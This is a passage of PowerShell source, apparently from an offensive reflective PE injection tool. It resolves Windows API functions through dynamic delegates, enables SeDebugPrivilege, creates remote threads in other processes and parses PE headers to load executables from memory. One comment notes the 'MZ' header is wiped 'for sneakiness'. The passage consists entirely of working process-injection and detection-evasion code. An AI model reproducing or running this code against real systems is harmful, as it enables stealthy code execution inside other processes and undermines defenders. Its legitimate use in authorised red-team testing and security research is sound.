Get-DelegateType @([IntPtr], [String]) ([IntPtr])\n\t\t    $GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate)\n\t\t    $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value $GetProcAddress\n\t\t\n\t\t    $GetProcAddressOrdinalAddr = Get-ProcAddress kernel32.dll GetProcAddress\n\t\t    $GetProcAddressOrdinalDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([IntPtr])\n\t\t    $GetProcAddressOrdinal = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressOrdinalAddr, $GetProcAddressOrdinalDelegate)\n\t\t    $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddressOrdinal -Value $GetProcAddressOrdinal\n\t\t\n\t\t    $VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree\n\t\t    $VirtualFreeDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32]) ([Bool])\n\t\t    $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate)\n\t\t    $Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree\n\t\t\n\t\t    $VirtualFreeExAddr = Get-ProcAddress kernel32.dll VirtualFreeEx\n\t\t    $VirtualFreeExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) ([Bool])\n\t\t    $VirtualFreeEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeExAddr, $VirtualFreeExDelegate)\n\t\t    $Win32Functions | Add-Member NoteProperty -Name VirtualFreeEx -Value $VirtualFreeEx\n\t\t\n\t\t    $VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect\n\t\t    $VirtualProtectDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool])\n\t\t    $VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate)\n\t\t    $Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect\n\t\t\n\t\t    $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA\n\t\t    $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr])\n\t\t    $GetModuleHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate)\n\t\t    $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle\n\t\t\n\t\t    $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary\n\t\t    $FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool])\n\t\t    $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate)\n\t\t    $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary\n\t\t\n\t\t    $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess\n\t        $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])\n\t        $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)\n\t\t    $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenProcess -Value $OpenProcess\n\t\t\n\t\t    $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject\n\t        $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [UInt32]) ([UInt32])\n\t        $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)\n\t\t    $Win32Functions | Add-Member -MemberType NoteProperty -Name WaitForSingleObject -Value $WaitForSingleObject\n\t\t\n\t\t    $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory\n            $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])\n            $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate)\n\t\t    $Win32Functions | Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value $WriteProcessMemory\n\t\t\n\t\t    $ReadProcessMemoryAddr = Get-ProcAddress kernel32.dll ReadProcessMemory\n            $ReadProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])\n            $ReadProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ReadProcessMemoryAddr, $ReadProcessMemoryDelegate)\n\t\t    $Win32Functions | Add-Member -MemberType NoteProperty -Name ReadProcessMemory -Value $ReadProcessMemory\n\t\t\n\t\t    $CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread\n            $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])\n            $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate)\n\t\t    $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateRemoteThread -Value $CreateRemoteThread\n\t\t\n\t\t    $GetExitCodeThreadAddr = Get-ProcAddress kernel32.dll GetExitCodeThread\n            $GetExitCodeThreadDelegate = Get-DelegateType @([IntPtr], [Int32].MakeByRefType()) ([Bool])\n            $GetExitCodeThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetExitCodeThreadAddr, $GetExitCodeThreadDelegate)\n\t\t    $Win32Functions | Add-Member -MemberType NoteProperty -Name GetExitCodeThread -Value $GetExitCodeThread\n\t\t\n\t\t    $OpenThreadTokenAddr = Get-ProcAddress Advapi32.dll OpenThreadToken\n            $OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool])\n            $OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate)\n\t\t    $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenThreadToken -Value $OpenThreadToken\n\t\t\n\t\t    $GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread\n            $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr])\n            $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate)\n\t\t    $Win32Functions | Add-Member -MemberType NoteProperty -Name GetCurrentThread -Value $GetCurrentThread\n\t\t\n\t\t    $AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges\n            $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], [IntPtr], [UInt32], [IntPtr], [IntPtr]) ([Bool])\n            $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate)\n\t\t    $Win32Functions | Add-Member -MemberType NoteProperty -Name AdjustTokenPrivileges -Value $AdjustTokenPrivileges\n\t\t\n\t\t    $LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA\n            $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], [IntPtr]) ([Bool])\n            $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate)\n\t\t    $Win32Functions | Add-Member -MemberType NoteProperty -Name LookupPrivilegeValue -Value $LookupPrivilegeValue\n\t\t\n\t\t    $ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf\n            $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool])\n            $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate)\n\t\t    $Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf\n\t\t\n\t\t    $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx\n            $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32])\n            $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate)\n\t\t    $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx\n\t\t\n\t\t    $IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process\n            $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool])\n            $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate)\n\t\t    $Win32Functions | Add-Member -MemberType NoteProperty -Name IsWow64Process -Value $IsWow64Process\n\t\t\n\t\t    $CreateThreadAddr = Get-ProcAddress Kernel32.dll CreateThread\n            $CreateThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([IntPtr])\n            $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate)\n\t\t    $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateThread -Value $CreateThread\n\t\t\n\t\t    return $Win32Functions\n\t    }\n\t    #####################################\n\n\t\t\t\n\t    #####################################\n\t    ###########    HELPERS   ############\n\t    #####################################\n\n\t    #Powershell only does signed arithmetic, so if we want to calculate memory addresses we have to use this function\n\t    #This will add signed integers as if they were unsigned integers so we can accurately calculate memory addresses\n\t    Function Sub-SignedIntAsUnsigned\n\t    {\n\t\t    Param(\n\t\t    [Parameter(Position = 0, Mandatory = $true)]\n\t\t    [Int64]\n\t\t    $Value1,\n\t\t\n\t\t    [Parameter(Position = 1, Mandatory = $true)]\n\t\t    [Int64]\n\t\t    $Value2\n\t\t    )\n\t\t\n\t\t    [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)\n\t\t    [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)\n\t\t    [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)\n\n\t\t    if ($Value1Bytes.Count -eq $Value2Bytes.Count)\n\t\t    {\n\t\t\t    $CarryOver = 0\n\t\t\t    for ($i = 0; $i -lt $Value1Bytes.Count; $i++)\n\t\t\t    {\n\t\t\t\t    $Val = $Value1Bytes[$i] - $CarryOver\n\t\t\t\t    #Sub bytes\n\t\t\t\t    if ($Val -lt $Value2Bytes[$i])\n\t\t\t\t    {\n\t\t\t\t\t    $Val += 256\n\t\t\t\t\t    $CarryOver = 1\n\t\t\t\t    }\n\t\t\t\t    else\n\t\t\t\t    {\n\t\t\t\t\t    $CarryOver = 0\n\t\t\t\t    }\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t    [UInt16]$Sum = $Val - $Value2Bytes[$i]\n\n\t\t\t\t    $FinalBytes[$i] = $Sum -band 0x00FF\n\t\t\t    }\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    Throw \"Cannot subtract bytearrays of different sizes\"\n\t\t    }\n\t\t\n\t\t    return [BitConverter]::ToInt64($FinalBytes, 0)\n\t    }\n\t\n\n\t    Function Add-SignedIntAsUnsigned\n\t    {\n\t\t    Param(\n\t\t    [Parameter(Position = 0, Mandatory = $true)]\n\t\t    [Int64]\n\t\t    $Value1,\n\t\t\n\t\t    [Parameter(Position = 1, Mandatory = $true)]\n\t\t    [Int64]\n\t\t    $Value2\n\t\t    )\n\t\t\n\t\t    [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)\n\t\t    [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)\n\t\t    [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)\n\n\t\t    if ($Value1Bytes.Count -eq $Value2Bytes.Count)\n\t\t    {\n\t\t\t    $CarryOver = 0\n\t\t\t    for ($i = 0; $i -lt $Value1Bytes.Count; $i++)\n\t\t\t    {\n\t\t\t\t    #Add bytes\n\t\t\t\t    [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver\n\n\t\t\t\t    $FinalBytes[$i] = $Sum -band 0x00FF\n\t\t\t\t\n\t\t\t\t    if (($Sum -band 0xFF00) -eq 0x100)\n\t\t\t\t    {\n\t\t\t\t\t    $CarryOver = 1\n\t\t\t\t    }\n\t\t\t\t    else\n\t\t\t\t    {\n\t\t\t\t\t    $CarryOver = 0\n\t\t\t\t    }\n\t\t\t    }\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    Throw \"Cannot add bytearrays of different sizes\"\n\t\t    }\n\t\t\n\t\t    return [BitConverter]::ToInt64($FinalBytes, 0)\n\t    }\n\t\n\n\t    Function Compare-Val1GreaterThanVal2AsUInt\n\t    {\n\t\t    Param(\n\t\t    [Parameter(Position = 0, Mandatory = $true)]\n\t\t    [Int64]\n\t\t    $Value1,\n\t\t\n\t\t    [Parameter(Position = 1, Mandatory = $true)]\n\t\t    [Int64]\n\t\t    $Value2\n\t\t    )\n\t\t\n\t\t    [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)\n\t\t    [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)\n\n\t\t    if ($Value1Bytes.Count -eq $Value2Bytes.Count)\n\t\t    {\n\t\t\t    for ($i = $Value1Bytes.Count-1; $i -ge 0; $i--)\n\t\t\t    {\n\t\t\t\t    if ($Value1Bytes[$i] -gt $Value2Bytes[$i])\n\t\t\t\t    {\n\t\t\t\t\t    return $true\n\t\t\t\t    }\n\t\t\t\t    elseif ($Value1Bytes[$i] -lt $Value2Bytes[$i])\n\t\t\t\t    {\n\t\t\t\t\t    return $false\n\t\t\t\t    }\n\t\t\t    }\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    Throw \"Cannot compare byte arrays of different size\"\n\t\t    }\n\t\t\n\t\t    return $false\n\t    }\n\t\n\n\t    Function Convert-UIntToInt\n\t    {\n\t\t    Param(\n\t\t    [Parameter(Position = 0, Mandatory = $true)]\n\t\t    [UInt64]\n\t\t    $Value\n\t\t    )\n\t\t\n\t\t    [Byte[]]$ValueBytes = [BitConverter]::GetBytes($Value)\n\t\t    return ([BitConverter]::ToInt64($ValueBytes, 0))\n\t    }\n\t\n\t\n\t    Function Test-MemoryRangeValid\n\t    {\n\t\t    Param(\n\t\t    [Parameter(Position = 0, Mandatory = $true)]\n\t\t    [String]\n\t\t    $DebugString,\n\t\t\n\t\t    [Parameter(Position = 1, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $PEInfo,\n\t\t\n\t\t    [Parameter(Position = 2, Mandatory = $true)]\n\t\t    [IntPtr]\n\t\t    $StartAddress,\n\t\t\n\t\t    [Parameter(ParameterSetName = \"EndAddress\", Position = 3, Mandatory = $true)]\n\t\t    [IntPtr]\n\t\t    $EndAddress,\n\t\t\n\t\t    [Parameter(ParameterSetName = \"Size\", Position = 3, Mandatory = $true)]\n\t\t    [IntPtr]\n\t\t    $Size\n\t\t    )\n\t\t\n\t\t    [IntPtr]$FinalEndAddress = [IntPtr]::Zero\n\t\t    if ($PsCmdlet.ParameterSetName -eq \"Size\")\n\t\t    {\n\t\t\t    [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    $FinalEndAddress = $EndAddress\n\t\t    }\n\t\t\n\t\t    $PEEndAddress = $PEInfo.EndAddress\n\t\t\n\t\t    if ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.PEHandle) ($StartAddress)) -eq $true)\n\t\t    {\n\t\t\t    Throw \"Trying to write to memory smaller than allocated address range. $DebugString\"\n\t\t    }\n\t\t    if ((Compare-Val1GreaterThanVal2AsUInt ($FinalEndAddress) ($PEEndAddress)) -eq $true)\n\t\t    {\n\t\t\t    Throw \"Trying to write to memory greater than allocated address range. $DebugString\"\n\t\t    }\n\t    }\n\t\n\t\n\t    Function Write-BytesToMemory\n\t    {\n\t\t    Param(\n\t\t\t    [Parameter(Position=0, Mandatory = $true)]\n\t\t\t    [Byte[]]\n\t\t\t    $Bytes,\n\t\t\t\n\t\t\t    [Parameter(Position=1, Mandatory = $true)]\n\t\t\t    [IntPtr]\n\t\t\t    $MemoryAddress\n\t\t    )\n\t\n\t\t    for ($Offset = 0; $Offset -lt $Bytes.Length; $Offset++)\n\t\t    {\n\t\t\t    [System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Offset, $Bytes[$Offset])\n\t\t    }\n\t    }\n\t\n\n\t    #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/\n\t    Function Get-DelegateType\n\t    {\n\t        Param\n\t        (\n\t            [OutputType([Type])]\n\t        \n\t            [Parameter( Position = 0)]\n\t            [Type[]]\n\t            $Parameters = (New-Object Type[](0)),\n\t        \n\t            [Parameter( Position = 1 )]\n\t            [Type]\n\t            $ReturnType = [Void]\n\t        )\n\n\t        $Domain = [AppDomain]::CurrentDomain\n\t        $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')\n\t        $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\n\t        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)\n\t        $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])\n\t        $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)\n\t        $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')\n\t        $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)\n\t        $MethodBuilder.SetImplementationFlags('Runtime, Managed')\n\t    \n\t        Write-Output $TypeBuilder.CreateType()\n\t    }\n\n\n\t    #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/\n\t    Function Get-ProcAddress\n\t    {\n\t        Param\n\t        (\n\t            [OutputType([IntPtr])]\n\t    \n\t            [Parameter( Position = 0, Mandatory = $True )]\n\t            [String]\n\t            $Module,\n\t        \n\t            [Parameter( Position = 1, Mandatory = $True )]\n\t            [String]\n\t            $Procedure\n\t        )\n\n\t        # Get a reference to System.dll in the GAC\n\t        $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |\n\t            Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }\n\t        $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')\n\t        # Get a reference to the GetModuleHandle and GetProcAddress methods\n\t        $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')\n\t        $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')\n\t        # Get a handle to the module specified\n\t        $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))\n\t        $tmpPtr = New-Object IntPtr\n\t        $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)\n\n\t        # Return the address of the function\n\t        Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))\n\t    }\n\t\n\t\n\t    Function Enable-SeDebugPrivilege\n\t    {\n\t\t    Param(\n\t\t    [Parameter(Position = 1, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Functions,\n\t\t\n\t\t    [Parameter(Position = 2, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Types,\n\t\t\n\t\t    [Parameter(Position = 3, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Constants\n\t\t    )\n\t\t\n\t\t    [IntPtr]$ThreadHandle = $Win32Functions.GetCurrentThread.Invoke()\n\t\t    if ($ThreadHandle -eq [IntPtr]::Zero)\n\t\t    {\n\t\t\t    Throw \"Unable to get the handle to the current thread\"\n\t\t    }\n\t\t\n\t\t    [IntPtr]$ThreadToken = [IntPtr]::Zero\n\t\t    [Bool]$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n\t\t    if ($Result -eq $false)\n\t\t    {\n\t\t\t    $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\t\t\t    if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN)\n\t\t\t    {\n\t\t\t\t    $Result = $Win32Functions.ImpersonateSelf.Invoke(3)\n\t\t\t\t    if ($Result -eq $false)\n\t\t\t\t    {\n\t\t\t\t\t    Throw \"Unable to impersonate self\"\n\t\t\t\t    }\n\t\t\t\t\n\t\t\t\t    $Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n\t\t\t\t    if ($Result -eq $false)\n\t\t\t\t    {\n\t\t\t\t\t    Throw \"Unable to OpenThreadToken.\"\n\t\t\t\t    }\n\t\t\t    }\n\t\t\t    else\n\t\t\t    {\n\t\t\t\t    Throw \"Unable to OpenThreadToken. Error code: $ErrorCode\"\n\t\t\t    }\n\t\t    }\n\t\t\n\t\t    [IntPtr]$PLuid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.LUID))\n\t\t    $Result = $Win32Functions.LookupPrivilegeValue.Invoke($null, \"SeDebugPrivilege\", $PLuid)\n\t\t    if ($Result -eq $false)\n\t\t    {\n\t\t\t    Throw \"Unable to call LookupPrivilegeValue\"\n\t\t    }\n\n\t\t    [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.TOKEN_PRIVILEGES)\n\t\t    [IntPtr]$TokenPrivilegesMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize)\n\t\t    $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesMem, [Type]$Win32Types.TOKEN_PRIVILEGES)\n\t\t    $TokenPrivileges.PrivilegeCount = 1\n\t\t    $TokenPrivileges.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PLuid, [Type]$Win32Types.LUID)\n\t\t    $TokenPrivileges.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED\n\t\t    [System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenPrivileges, $TokenPrivilegesMem, $true)\n\n\t\t    $Result = $Win32Functions.AdjustTokenPrivileges.Invoke($ThreadToken, $false, $TokenPrivilegesMem, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero)\n\t\t    $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() #Need this to get success value or failure value\n\t\t    if (($Result -eq $false) -or ($ErrorCode -ne 0))\n\t\t    {\n\t\t\t    #Throw \"Unable to call AdjustTokenPrivileges. Return value: $Result, Errorcode: $ErrorCode\"   #todo need to detect if already set\n\t\t    }\n\t\t\n\t\t    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)\n\t    }\n\t\n\t\n\t    Function Invoke-CreateRemoteThread\n\t    {\n\t\t    Param(\n\t\t    [Parameter(Position = 1, Mandatory = $true)]\n\t\t    [IntPtr]\n\t\t    $ProcessHandle,\n\t\t\n\t\t    [Parameter(Position = 2, Mandatory = $true)]\n\t\t    [IntPtr]\n\t\t    $StartAddress,\n\t\t\n\t\t    [Parameter(Position = 3, Mandatory = $false)]\n\t\t    [IntPtr]\n\t\t    $ArgumentPtr = [IntPtr]::Zero,\n\t\t\n\t\t    [Parameter(Position = 4, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Functions\n\t\t    )\n\t\t\n\t\t    [IntPtr]$RemoteThreadHandle = [IntPtr]::Zero\n\t\t\n\t\t    $OSVersion = [Environment]::OSVersion.Version\n\t\t    #Vista and Win7\n\t\t    if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2)))\n\t\t    {\n\t\t\t    Write-Verbose \"Windows Vista/7 detected, using NtCreateThreadEx. Address of thread: $StartAddress\"\n\t\t\t    $RetVal= $Win32Functions.NtCreateThreadEx.Invoke([Ref]$RemoteThreadHandle, 0x1FFFFF, [IntPtr]::Zero, $ProcessHandle, $StartAddress, $ArgumentPtr, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero)\n\t\t\t    $LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\t\t\t    if ($RemoteThreadHandle -eq [IntPtr]::Zero)\n\t\t\t    {\n\t\t\t\t    Throw \"Error in NtCreateThreadEx. Return value: $RetVal. LastError: $LastError\"\n\t\t\t    }\n\t\t    }\n\t\t    #XP/Win8\n\t\t    else\n\t\t    {\n\t\t\t    Write-Verbose \"Windows XP/8 detected, using CreateRemoteThread. Address of thread: $StartAddress\"\n\t\t\t    $RemoteThreadHandle = $Win32Functions.CreateRemoteThread.Invoke($ProcessHandle, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, $StartAddress, $ArgumentPtr, 0, [IntPtr]::Zero)\n\t\t    }\n\t\t\n\t\t    if ($RemoteThreadHandle -eq [IntPtr]::Zero)\n\t\t    {\n\t\t\t    Write-Verbose \"Error creating remote thread, thread handle is null\"\n\t\t    }\n\t\t\n\t\t    return $RemoteThreadHandle\n\t    }\n\n\t\n\n\t    Function Get-ImageNtHeaders\n\t    {\n\t\t    Param(\n\t\t    [Parameter(Position = 0, Mandatory = $true)]\n\t\t    [IntPtr]\n\t\t    $PEHandle,\n\t\t\n\t\t    [Parameter(Position = 1, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Types\n\t\t    )\n\t\t\n\t\t    $NtHeadersInfo = New-Object System.Object\n\t\t\n\t\t    #Normally would validate DOSHeader here, but we did it before this function was called and then destroyed 'MZ' for sneakiness\n\t\t    $dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER)\n\n\t\t    #Get IMAGE_NT_HEADERS\n\t\t    [IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew))\n\t\t    $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr\n\t\t    $imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS64)\n\t\t\n\t\t    #Make sure the IMAGE_NT_HEADERS checks out. If it doesn't, the data structure is invalid. This should never happen.\n\t        if ($imageNtHeaders64.Signature -ne 0x00004550)\n\t        {\n\t            throw \"Invalid IMAGE_NT_HEADER signature.\"\n\t        }\n\t\t\n\t\t    if ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC')\n\t\t    {\n\t\t\t    $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders64\n\t\t\t    $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    $ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32)\n\t\t\t    $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32\n\t\t\t    $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false\n\t\t    }\n\t\t\n\t\t    return $NtHeadersInfo\n\t    }\n\n\n\t    #This function will get the information needed to allocated space in memory for the PE\n\t    Function Get-PEBasicInfo\n\t    {\n\t\t    Param(\n\t\t    [Parameter( Position = 0, Mandatory = $true )]\n\t\t    [Byte[]]\n\t\t    $PEBytes,\n\t\t\n\t\t    [Parameter(Position = 1, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Types\n\t\t    )\n\t\t\n\t\t    $PEInfo = New-Object System.Object\n\t\t\n\t\t    #Write the PE to memory temporarily so I can get information from it. This is not it's final resting spot.\n\t\t    [IntPtr]$UnmanagedPEBytes = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PEBytes.Length)\n\t\t    [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $UnmanagedPEBytes, $PEBytes.Length) | Out-Null\n\t\t\n\t\t    #Get 